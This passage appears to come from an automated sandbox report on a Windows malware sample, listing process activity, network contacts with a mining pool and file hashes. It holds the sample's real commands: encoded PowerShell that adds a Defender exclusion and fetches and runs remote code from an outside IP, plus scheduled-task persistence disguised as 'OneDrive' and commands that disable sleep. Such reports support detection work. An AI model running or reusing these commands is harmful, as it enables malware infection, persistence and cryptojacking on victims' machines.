PID 1740 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4780 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4780 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4780 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4780 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4780 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4780 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4780 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4780 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4732 wrote to memory of 4956 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 4732 wrote to memory of 4956 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 2296 wrote to memory of 4508 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2296 wrote to memory of 4508 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2296 wrote to memory of 3912 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2296 wrote to memory of 3912 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2296 wrote to memory of 1372 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2296 wrote to memory of 1372 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2296 wrote to memory of 4920 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2296 wrote to memory of 4920 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4732 wrote to memory of 3868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 4732 wrote to memory of 3868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 4732 wrote to memory of 3868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 4732 wrote to memory of 4912 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 4732 wrote to memory of 4912 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 4732 wrote to memory of 4912 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 2312 wrote to memory of 4932 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2312 wrote to memory of 4932 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2312 wrote to memory of 4432 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2312 wrote to memory of 4432 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2312 wrote to memory of 4616 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2312 wrote to memory of 4616 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2312 wrote to memory of 3860 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2312 wrote to memory of 3860 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2308 wrote to memory of 220 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 2308 wrote to memory of 812 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 4912 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 4912 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 4912 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 4912 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 4912 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 4912 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 4912 wrote to memory of 672 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 4912 wrote to memory of 672 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 4912 wrote to memory of 672 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 672 wrote to memory of 1212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 672 wrote to memory of 1212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 672 wrote to memory of 1212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe

"C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 22:40 /du 23:59 /sc daily /ri 1 /f

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4585.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

Network

Country Destination Domain Proto
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 254.23.238.8.in-addr.arpa udp
US 93.184.220.29:80 tcp
US 8.8.8.8:53 23.41.204.62.in-addr.arpa udp
US 8.8.8.8:53 33.146.190.20.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 52.242.101.226:443 tcp
US 34.117.59.81:80 ipinfo.io tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 20.189.173.5:443 tcp
NL 8.238.21.126:80 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
US 131.253.33.203:80 tcp
US 8.8.8.8:53 121.208.253.8.in-addr.arpa udp
US 8.8.8.8:53 maper.info udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 148.251.234.93:443 maper.info tcp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 52.242.101.226:443 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 63.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 52.242.101.226:443 tcp
US 52.242.101.226:443 tcp
NL 8.238.21.126:80 tcp
US 52.242.101.226:443 tcp
US 52.242.101.226:443 tcp

Files

memory/1740-133-0x00000000009C0000-0x00000000009D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xr2swawa.kb4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4780-144-0x000002A3690C0000-0x000002A3690E2000-memory.dmp

memory/2832-172-0x000002423F420000-0x000002423F430000-memory.dmp

memory/4780-173-0x000002A369810000-0x000002A369820000-memory.dmp

memory/4732-174-0x000001EE9DFD0000-0x000001EE9DFE0000-memory.dmp

memory/2832-175-0x000002423F420000-0x000002423F430000-memory.dmp

memory/3604-176-0x000001E6F5690000-0x000001E6F56A0000-memory.dmp

memory/3604-177-0x000001E6F5690000-0x000001E6F56A0000-memory.dmp

memory/4732-179-0x000001EE9DFD0000-0x000001EE9DFE0000-memory.dmp

memory/4780-178-0x000002A369810000-0x000002A369820000-memory.dmp

memory/3604-180-0x000001E6F5690000-0x000001E6F56A0000-memory.dmp

memory/2832-181-0x000002423F420000-0x000002423F430000-memory.dmp

memory/2832-184-0x000002423F420000-0x000002423F430000-memory.dmp

memory/4780-185-0x000002A369810000-0x000002A369820000-memory.dmp

memory/4732-186-0x000001EE9DFD0000-0x000001EE9DFE0000-memory.dmp

memory/2832-187-0x000002423F420000-0x000002423F430000-memory.dmp

memory/3604-188-0x000001E6F5690000-0x000001E6F56A0000-memory.dmp

memory/3604-189-0x000001E6F5690000-0x000001E6F56A0000-memory.dmp

memory/4780-191-0x000002A369810000-0x000002A369820000-memory.dmp

memory/2832-190-0x000002423F420000-0x000002423F430000-memory.dmp

memory/4732-192-0x000001EE9DFD0000-0x000001EE9DFE0000-memory.dmp

memory/3604-193-0x000001E6F5690000-0x000001E6F56A0000-memory.dmp

memory/1528-194-0x0000000000400000-0x000000000040C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0c9e4a5091153aad3afaf5372fbb07a0
SHA1 dbe1fc5ac93d241d51311f638d8a386f01bf25aa
SHA256 f88bdcf6352355427dc31af5f99817e7ead0349ba5b17e0dc5331ad424e7b6e4
SHA512 3e0811a82f7eb57c32e3eaeee734951c93ea3616476fa3e52ebb135de41ead7855db5539f991f6826568fc4d658fa7a266fdfe4e3840bdb9813005d6e7ee746e

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/1528-198-0x00000000050B0000-0x0000000005116000-memory.dmp

memory/1528-199-0x00000000051C0000-0x000000000525C000-memory.dmp

memory/1528-200-0x0000000005260000-0x00000000052C6000-memory.dmp

memory/1528-204-0x0000000005630000-0x0000000005640000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/4200-213-0x000001DEF24A0000-0x000001DEF24B0000-memory.dmp

memory/4200-217-0x000001DEF24A0000-0x000001DEF24B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0c9e4a5091153aad3afaf5372fbb07a0
SHA1 dbe1fc5ac93d241d51311f638d8a386f01bf25aa
SHA256 f88bdcf6352355427dc31af5f99817e7ead0349ba5b17e0dc5331ad424e7b6e4
SHA512 3e0811a82f7eb57c32e3eaeee734951c93ea3616476fa3e52ebb135de41ead7855db5539f991f6826568fc4d658fa7a266fdfe4e3840bdb9813005d6e7ee746e

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

memory/4200-233-0x000001DEF24A0000-0x000001DEF24B0000-memory.dmp

memory/3868-234-0x0000000000400000-0x000000000058B000-memory.dmp

memory/4200-235-0x000001DEF24A0000-0x000001DEF24B0000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/4956-239-0x00007FF6BFB10000-0x00007FF6C04DA000-memory.dmp

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/4912-251-0x00000000008B0000-0x0000000000CD0000-memory.dmp

memory/4912-252-0x00000000008B0000-0x0000000000CD0000-memory.dmp

memory/4912-253-0x00000000008B0000-0x0000000000CD0000-memory.dmp

memory/4912-255-0x0000000006FF0000-0x0000000007594000-memory.dmp

memory/4912-257-0x0000000006B40000-0x0000000006BD2000-memory.dmp

memory/4072-256-0x000001EF9AC50000-0x000001EF9AC60000-memory.dmp

memory/4072-254-0x000001EF9AC50000-0x000001EF9AC60000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2f28840c31cfc5322025fe3d865ba93e
SHA1 a7e5821a77330ad789add83f5e8bbb60513b9a1c
SHA256 fbe81573de344e57534ac098c44252bbd81bd76009120f16b4c11cd48a4b551e
SHA512 6c819271b07a320b85c33475504b1b7b5e1fb57c78facd1bdd29a623a9dd3d11d6e2f7cd78e8b81da4b28a7e61b0caf6694894033d05c064f8e70dd06350ae4b

memory/1528-269-0x0000000005630000-0x0000000005640000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2ac3c9ba89b8c2ef19c601ecebb82157
SHA1 a239a4b11438c00e5ff89ebd4a804ede6a01935b
SHA256 3c2714ce07f8c04b3f8222dfe50d8ae08f548b0e6e79fe33d08bf6f4c2e5143e
SHA512 b1221d29e747b37071761b2509e9109b522cce6411f73f27c9428ac332d26b9f413ae6b8c0aeac1afb7fab2d0b3b1c4af189da12fe506287596df2ef8f083432

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/812-277-0x0000023985970000-0x0000023985990000-memory.dmp

memory/2308-276-0x00007FF6A2590000-0x00007FF6A2F5A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8b5d3a2c2b26ac36b88cf03dd0a32fa9
SHA1 a9122eb088176912311fc0f8eb0b8f020693d259
SHA256 8a11a416df1c3ef93ee65773a43d84cdec960e9d551fcb0a4351fc15f1d0ff52
SHA512 47e0f4eddc7e7323988597ac5fcf7c7ea15a9999667e07d6cc422fb072a5d2e0c5501a11db8b4f5e8a0f380a85ef0a60f9a201ed30f80b104b825bfe8d60a7c6

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/4912-294-0x00000000008B0000-0x0000000000CD0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lsass.exe.log

MD5 24cfd42a8de70b38ed70e1f8cf4eda1c
SHA1 e447168fd38da9175084b36a06c3e9bbde99064c
SHA256 93b740416114e346878801c73e8a8670ff1390d3fa009424b88fafe614a3c5cd
SHA512 5c2daf5328ba99d750e9d0362e84f3a79b7fc8395aa8aa2bc1a01b266583fe1f8352bf0619f985aa72223412d14afa054537739b4941610a1d0f96e7fee2a875

memory/2940-296-0x0000000000B20000-0x0000000000F40000-memory.dmp

memory/2940-297-0x0000000000B20000-0x0000000000F40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp4585.tmp.bat

MD5 5576954a22523de856c2b60faae0416c
SHA1 03ef8615babe305844623e6a7b18057c8c1e877a
SHA256 834efbd0b2a94e71425f18204c18c3d3966098e72ce238881a562a668be22da3
SHA512 0d1ca96b8350c59c404fd89b3bfd4508ba1e0a9d7e4e175a6bf97962ee179c7c8e2de97eb51256a420be84a198d4b0c4f6f4b25b49f7d025c5d0584bb9ebdfd4

memory/2940-299-0x0000000000B20000-0x0000000000F40000-memory.dmp

memory/812-300-0x0000023987370000-0x00000239873B0000-memory.dmp

memory/3868-301-0x0000000000400000-0x000000000058B000-memory.dmp

memory/2940-306-0x0000000006CD0000-0x0000000006CDA000-memory.dmp

C:\Users\Admin\Desktop\PublishRead.txt

MD5 17700405062181a5b94a7430f5cf5954
SHA1 be180e7596885a6358675e7a63408a40096f8405
SHA256 e6318a937b2514ad6c454f3f97a6ac3653765ef0b2b98419256a2e95d656c86f
SHA512 358180b68ec59e895d2691327533e153334cb4b626d024836d9d6a1e092cec2adec55bb524cb76716d9a8884b92b510351c7600af7b1468fee29fd9696d46412

memory/220-330-0x00007FF61F900000-0x00007FF61F929000-memory.dmp

memory/812-331-0x00007FF641860000-0x00007FF64204F000-memory.dmp

memory/2940-332-0x0000000000B20000-0x0000000000F40000-memory.dmp

